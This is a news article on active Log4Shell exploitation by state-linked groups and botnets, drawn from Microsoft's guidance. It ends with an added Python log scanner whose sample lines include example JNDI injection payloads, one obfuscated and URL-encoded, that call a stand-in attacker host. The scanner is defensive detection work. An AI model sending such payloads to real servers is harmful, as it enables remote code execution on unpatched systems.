Log4j Threat Worsens As Microsoft Warns Of Multiple State-Sponsored Hackers On The Warpath

In case you weren't yet taking the Log4shell vulnerability in Apache's Log4j seriously, here's another reason to do so: threat actors associated with malware distributors, ransomware-as-a-service vendors, and even nation-states are actively exploiting the flaw. Bad guys are scanning the web en masse looking for unpatched systems, and if you're running a server with an unpatched Log4j, they're likely to find it sooner rather than later.

This bit of information comes straight from Microsoft, which updated its guidance on the flaw yesterday. The article, originally posted on Saturday when the flaw hit the mainstream, was updated yesterday to include information about active, ongoing threats that are attempting to exploit the flaw, as well as some further guidance to help defend against those specific threats.

Microsoft calls out China, Iran, North Korea, and Turkey as the nation-states exploiting the security hole, although the US company is careful to explain that activity from the nations ranges from "experimentation during development" through "exploitation against targets to achieve the actor's objectives." In other words, some of these countries might simply be probing the flaw as part of security testing, others are integrating the flaw into their existing hacker toolkits, and still others are actively attempting to use it right now.

The Microsoft Threat Intelligence Center (MSTIC) notes more specifically that it has observed Iran's PHOSPHORUS group, known for deploying ransomware, "acquiring and creating modifications" of the exploit, while the Chinese threat actor HAFNIUM has been using the vulnerability to "attack virtualization infrastructure." Microsoft says HAFNIUM operators are using "a DNS service typically associated with testing" to fingerprint systems.


The company goes on to mention that existing malware campaigns and botnets are already making heavy use of the exploit. Mirai, one of the largest extant botnets, has apparently been retrofitted with the ability to target the flaw. Likewise, folks who were targeting Elasticsearch have moved over to Log4shell to deploy crypto-miner malware. The house that Bill and Paul built says that the Tsunami backdoor for Linux is seeing a resurgence, too. Log4j is a Java application, and Java is multi-platform, after all. Attacks can be configured using Base64 commands in the request to simultaneously target shell scripts on Linux and PowerShell commands on Windows.

As far as prevention goes, Microsoft naturally recommends that its customers make use of its security tools, particularly Microsoft Defender Antivirus and Anti-malware. Folks who use Microsoft Defender for Endpoint can enable a specific rule—"block executable files from running unless they meet a prevalence, age, or trusted list criterion"—to help mitigate the effects of the flaw.

However, because this flaw is so serious, and so prevalent, Microsoft actually recommends that most of its customers look for signs that they have already been exploited "rather than fully relying on prevention." The old saying goes that an ounce of prevention is worth a pound of cure, but it seems in this case—much like with the recent pandemic—prevention is almost impossible, so it's best to move on to the next step. You can read the rest of Microsoft's guidance at its blog.
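As an added defender-side example (not code from the Microsoft post or from this article), here is a small Python scanner that applies the "look for signs of exploitation" advice to web access logs: it URL-decodes each line, peels the nested-lookup obfuscation attackers use to hide the `${jndi:` string, flags lines carrying a lookup, and decodes base64 runs in the lookup so an analyst can see the command it carried (the Linux/Windows dual-payload trick mentioned above). The log lines, IP addresses and hostnames are constructed.

```python
import base64
import re
from urllib.parse import unquote
# Constructed sample access-log lines (not real traffic); the third is URL-encoded and obfuscated.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"
10.0.0.7 - - [14/Dec/2021:10:01:09 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.invalid%2FZWNobyBoZWxsbw%3D%3D%7D HTTP/1.1" 400 0 "-" "curl/7.79"
"""
# Nested-lookup wrappers that hide the literal "jndi" (${lower:j}, ${upper:J},
# ${::-j}, ${env:NOPE:-j}); each is replaced by the literal it evaluates to.
WRAPPERS = [re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE),
            re.compile(r"\$\{[^{}]*:-([^{}]*)\}")]
JNDI = re.compile(r"\$\{jndi:[^{}]*\}", re.IGNORECASE)
B64RUN = re.compile(r"[A-Za-z0-9+/]+={0,2}")

def normalize(line: str) -> str:
    """URL-decode, then peel wrappers until nothing changes."""
    text = unquote(line)
    while True:
        peeled = WRAPPERS[1].sub(r"\1", WRAPPERS[0].sub(r"\1", text))
        if peeled == text:
            return text
        text = peeled

def decode_b64(text: str) -> list:
    """Decode base64 runs that yield printable ASCII, for analyst review."""
    decoded = []
    for run in B64RUN.findall(text):
        # '/' is both a path separator and a base64 char: try the whole run, then the tail after each '/'.
        cands = [run] + [run[i + 1:] for i, c in enumerate(run) if c == "/"]
        for cand in (c for c in cands if len(c) >= 12):
            try:
                raw = base64.b64decode(cand, validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            if all(32 <= b < 127 for b in raw):
                decoded.append(raw.decode("ascii"))
                break
    return decoded

def scan(log_text: str) -> list:
    """One finding per line whose normalized form contains a JNDI lookup."""
    findings = []
    for line in log_text.splitlines():
        hit = JNDI.search(normalize(line))
        if hit:
            findings.append({"src": line.split(" ", 1)[0], "lookup": hit.group(0),
                             "decoded": decode_b64(hit.string)})
    return findings
```

Run `scan(open("access.log").read())` against your own logs; a match is only an attempt, so a hit should be followed by checking the server's outbound connections and process activity from that time window.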